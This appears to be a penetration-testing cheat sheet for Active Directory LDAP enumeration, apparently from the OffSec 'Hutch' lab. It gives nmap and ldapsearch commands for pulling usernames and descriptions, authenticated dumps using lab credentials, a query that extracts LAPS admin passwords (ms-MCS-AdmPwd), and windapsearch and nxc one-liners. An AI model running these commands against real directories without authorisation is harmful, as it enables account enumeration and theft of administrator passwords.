Enumerating AD

# Scan for LDAP service & version
nmap -n -sV --script "ldap*" hutch.offsec

# Extract sAMAccountName and save to users.txt
ldapsearch -x -H ldap://target -D '' -w '' -b "DC=,DC=" | grep
sAMAccountName: | awk -F: '{print $2}' | tr -d " " > users.txt

# Find LDAP entries with a description
ldapsearch -x -H ldap://target -D '' -w '' -b "DC=,DC=" | grep description:

# All users, or computer
ldapsearch -x -H ldap://target -D "CN=web_svc,CN=Users,DC=dc,DC=dc" -w Password1 -b "DC=dc,DC=dc"
"(objectClass=user)"

ldapsearch -h IP -x -b "DC=,DC=" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "

# Dump all LDAP entries using creds
ldapsearch -x -H ldap://target -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b
"DC=hutch,DC=offsec"

# Extract ms-MCS-AdmPwd (admin password)
ldapsearch -x -H ldap://target -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b
"DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

# winldapsearch
windapsearch --dc-ip IP -u "" -U

# nxc
nxc ldap IP -u user -p pass